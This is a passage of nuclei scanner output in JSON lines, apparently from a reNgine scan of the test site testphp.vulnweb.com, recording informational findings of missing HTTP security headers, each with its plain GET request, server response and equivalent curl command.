'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36' 'http://testphp.vulnweb.com/CVS/Root'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Root\",\"path\":\"/CVS/Root\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Root\",\"request\":\"GET /CVS/Root HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:32 GMT\\r\\nEtag: \\\"4dca64a4-1\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n \",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:32.148196921Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36' 'http://testphp.vulnweb.com/CVS/Root'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:32 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:32.526064332Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:32 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:32.526199234Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:32 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:32.600889512Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:32 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:32.601007302Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:32 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:32.601060407Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:32 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:33.062476088Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:32 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:33.062577374Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:33.500720456Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1\",\"path\":\"/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1\",\"request\":\"GET /Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:33.502459899Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:33.511152649Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31' 